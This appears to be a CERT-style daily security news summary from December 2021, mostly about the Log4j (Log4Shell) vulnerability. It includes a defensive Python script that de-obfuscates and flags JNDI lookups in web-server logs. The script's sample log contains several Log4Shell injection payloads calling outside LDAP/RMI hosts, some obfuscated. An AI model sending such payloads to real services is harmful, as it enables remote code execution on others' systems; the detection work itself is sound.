Daily summary - 13.12.2021

End-of-Day report

Timeframe: Friday 10-12-2021 18:00 - Monday 13-12-2021 18:00 Handler: Dimitri Robl Co-Handler: Thomas Pribitzer

News

Protection against the Log4j hole - what helps now and what rather does not

"Alert level red" for users and companies, but what does that mean concretely? How to test services for the Log4j hole and reduce your risk of attacks.

https://heise.de/-6292961


log4j-scan

We have been researching the Log4J RCE (CVE-2021-44228) since it was released, and we worked on preventing this vulnerability with our customers. We are open-sourcing an open detection and scanning tool for discovering and fuzzing for the Log4J RCE CVE-2021-44228 vulnerability.

https://github.com/fullhunt/log4j-scan
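
The scanner above probes services from the outside; the same de-obfuscation logic is useful on the defensive side when hunting for inbound exploitation attempts in web-server access logs. The following Python is an added example written for this summary, not code from log4j-scan or from any article linked here. It peels off the nested-lookup obfuscation that probes commonly wrap around the payload (`${lower:...}`, `${upper:...}`, `${key:-default}` and `${::-x}` defaults, single and double URL encoding) and then checks for the `${jndi:` marker. The log lines are constructed for the example and use RFC 5737 documentation addresses; the `_resolve_one` helper only models the handful of log4j lookups that act as pure string transforms.

```python
"""Spot Log4Shell (CVE-2021-44228) probes in web-server access logs.

Added example for this summary, not code from log4j-scan or any linked article.
SAMPLE_LOG is constructed; the addresses are RFC 5737 documentation ranges.
"""
import re
from urllib.parse import unquote

# An innermost ${...} lookup: its body contains no further "$", "{" or "}".
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we are hunting for once the obfuscation layers are peeled away.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_one(body: str):
    """Evaluate one non-nested lookup the way log4j 2.x does for the few
    lookups attackers use purely as string transforms (assumption: only
    lower/upper and the ':-' default syntax are modelled here).
    Returns None when the lookup must be left untouched."""
    prefix, _, rest = body.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "jndi":
        return None                     # the payload itself: keep it intact
    if prefix == "lower":
        return rest.lower()             # ${lower:J} -> "j"
    if prefix == "upper":
        return rest.upper()             # ${upper:n} -> "N"
    if ":-" in body:
        return body.split(":-", 1)[1]   # ${env:UNSET:-d} and ${::-d} -> "d"
    return None                         # ${date:...}, ${sys:...}: unknown, keep


def normalize(s: str, max_rounds: int = 32) -> str:
    """Peel nested lookups from the inside out until nothing changes.
    Bounded so a pathological line cannot make the scanner spin."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            r = _resolve_one(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r

        s = _INNERMOST.sub(repl, s)
        if not changed:
            break
    return s


def jndi_payload(line: str):
    """Return the de-obfuscated ${jndi:...} lookup found in the line, or None."""
    # Two rounds of percent-decoding also catch double-encoded "%2524%257B" probes.
    norm = normalize(unquote(unquote(line)))
    m = _JNDI.search(norm)
    if not m:
        return None
    # After normalisation the jndi lookup holds no nested "{", so the next "}" closes it.
    end = norm.find("}", m.start())
    return norm[m.start():end + 1] if end != -1 else norm[m.start():]


def scan(lines):
    """Return (line_number, payload) for every line carrying a JNDI lookup."""
    return [(i, p) for i, l in enumerate(lines, 1) if (p := jndi_payload(l))]


SAMPLE_LOG = [  # constructed sample in Apache combined log format
    '203.0.113.5 - - [10/Dec/2021:22:14:01 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://203.0.113.77:1389/a}"',
    '198.51.100.9 - - [11/Dec/2021:03:07:44 +0000] "GET /?x=${${lower:j}ndi:'
    '${lower:l}${lower:d}a${lower:p}://198.51.100.80/o} HTTP/1.1" 404 196 "-" "curl/7.68.0"',
    '198.51.100.23 - - [11/Dec/2021:03:08:10 +0000] "GET /index.html HTTP/1.1" '
    '200 1043 "-" "Mozilla/5.0"',
    '203.0.113.41 - - [12/Dec/2021:17:30:02 +0000] "GET /%24%7B%24%7B%3A%3A-j%7Dndi'
    '%3Aldap%3A%2F%2F203.0.113.77%2Fx%7D HTTP/1.1" 404 196 "-" "-"',
    '203.0.113.41 - - [12/Dec/2021:17:30:03 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${upper:j}ndi:rmi://203.0.113.77/z}"',
]

if __name__ == "__main__":
    for lineno, payload in scan(SAMPLE_LOG):
        print(f"line {lineno}: {payload}")
```

Run it against a real access log with `scan(open("access.log").read().splitlines())`. Matching only on the literal string `${jndi:` would miss four of the five probes in the sample; the normalisation step is what makes the check robust against the casing and default-value tricks. Any line that still contains an unresolved `${` after normalisation is worth a look as well, since legitimate traffic rarely carries log4j lookup syntax.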


Ten families of malicious samples are spreading using the Log4j2 vulnerability Now

On December 11, 2021, at 8:00 pm, we published a blog disclosing Mirai and Muhstik botnet samples propagating through Log4j2 RCE vulnerability[1]. Over the past 2 days, we have captured samples from other families, and now the list of families has exceeded 10.

https://blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/


log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228

tl;dr Add our new tool, -javaagent:log4j-jndi-be-gone-1.0.0-standalone.jar, to all of your JVM Java stuff to stop log4j from loading classes remotely over LDAP. This will prevent malicious inputs from triggering the "Log4Shell" vulnerability and gaining remote code execution on your systems. In this post, we first offer some context on the vulnerability, the released fixes [...]

https://research.nccgroup.com/2021/12/12/log4j-jndi-be-gone-a-simple-mitigation-for-cve-2021-44228/


Malicious PyPI packages with over 10,000 downloads taken down

The Python Package Index (PyPI) registry has removed three malicious Python packages aimed at exfiltrating environment variables and dropping trojans on the infected machines. These malicious packages are estimated to have generated over 10,000 downloads across PyPI and its mirrors combined, according to the researchers' report.

https://www.bleepingcomputer.com/news/security/malicious-pypi-packages-with-over-10-000-downloads-taken-down/


Karakurt: A New Emerging Data Theft and Cyber Extortion Hacking Group

A previously undocumented, financially motivated threat group has been connected to a string of data theft and extortion attacks on over 40 entities between September and November 2021. The hacker collective, which goes by the self-proclaimed name Karakurt and was first identified in June 2021, is capable of modifying its tactics and techniques to adapt to the targeted environment, [...]

https://thehackernews.com/2021/12/karakurt-new-emerging-data-theft-and.html


HANCITOR DOC drops via CLIPBOARD

Hancitor, a loader that provides Malware as a Service, has been observed distributing malware such as FickerStealer, Pony, CobaltStrike, Cuba Ransomware, and many more. Recently at McAfee Labs, we observed Hancitor Doc VBA (Visual Basic for Applications) samples dropping the payload using the Windows clipboard through Selection.Copy method.

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hancitor-doc-drops-via-clipboard/


Diavol Ransomware

In the past, threat actors have used BazarLoader to deploy Ryuk and Conti ransomware, as reported on many occasions. In this intrusion, however, a BazarLoader infection resulted in deployment of Diavol Ransomware.

https://thedfirreport.com/2021/12/13/diavol-ransomware/


Bugs in the Cloud: How One Vulnerability Exposed 'Offline' Devices to a Security Risk

https://claroty.com/2021/12/13/blog-research-bugs-in-the-cloud-how-one-vulnerability-exposed-offline-devices-to-a-security-risk/


Forget the darknet - ransomware gangs pressure victims via social media

Ransomware groups use social network channels to advertise their attacks and thereby put their victims under further pressure to pay the ransom.

https://blog.emsisoft.com/de/39431/von-wegen-darknet-ransomware-gangs-setzen-opfer-per-social-media-unter-druck/


Now You Serial, Now You Don't - Systematically Hunting for Deserialization Exploits

Deserialization vulnerabilities are a class of bugs that have plagued multiple languages and applications over the years. These include Exchange (CVE-2021-42321), Zoho ManageEngine (CVE-2020-10189), Jira (CVE-2020-36239), Telerik (CVE-2019-18935), Jenkins (CVE-2016-9299), and more. Fundamentally, these bugs are a result of applications placing too much trust in data that a user (or attacker) can tamper with.

https://www.mandiant.com/resources/hunting-deserialization-exploits

Vulnerabilities

Log4j Vulnerability (CVE-2021-44228)

This repo contains operational information regarding the vulnerability in the Log4j logging library (CVE-2021-44228).

https://github.com/NCSC-NL/log4shell


VMSA-2021-0028

[...] Synopsis: VMware Response to Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

https://www.vmware.com/security/advisories/VMSA-2021-0028.html


Log4j Zero-Day Vulnerability

IBM X-Force Incident Command is following a recent disclosure regarding a vulnerability in the Log4j Java library. A report by LunaSec details the vulnerability as well as mitigation strategies for the vulnerability.

https://exchange.xforce.ibmcloud.com/collection/4daa3df4f73a51590efced7fb90bc949


Bugs in billions of WiFi, Bluetooth chips allow password, data theft

Researchers at the University of Darmstadt, Brescia, CNIT, and the Secure Mobile Networking Lab have published a paper that proves it is possible to extract passwords and manipulate traffic on a WiFi chip by targeting a device's Bluetooth component.

https://www.bleepingcomputer.com/news/security/bugs-in-billions-of-wifi-bluetooth-chips-allow-password-data-theft/


IBM Security Bulletins 2021-12-10 - 2021-12-13

WebSphere Application Server, Rational Application Developer for WebSphere, Spectrum Copy Data Management, Tivoli Netcool, Spectrum Protect, i2 Analyst's Notebook, Decision Optimization Center, ILOG CPLEX Optimization Studio, PowerVM, Db2

https://www.ibm.com/blogs/psirt/


Security updates for Monday

Security updates have been issued by Arch Linux (chromium, firefox, gitlab, grafana, grafana-agent, thunderbird, and vivaldi), Debian (apache-log4j2, privoxy, and wireshark), Fedora (firefox, grub2, mariadb, mod_auth_openidc, rust-drg, rust-tiny_http, and rust-tiny_http0.6), Mageia (chromium-browser-stable, curaengine, fetchmail, firefox, libvirt, log4j, opencontainers-runc, python-django, speex, and thunderbird), openSUSE (clamav, firefox, glib-networking, glibc, gmp, ImageMagick, log4j, [...]

https://lwn.net/Articles/878520/


CISA Adds Thirteen Known Exploited Vulnerabilities to Catalog

CISA has added thirteen new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.

https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog


Oracle Security Alert for CVE-2021-44228 - 10 December 2021

https://www.oracle.com/security-alerts/alert-cve-2021-44228.html


Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd


Citrix Security Advisory for Apache CVE-2021-44228

https://support.citrix.com/article/CTX335705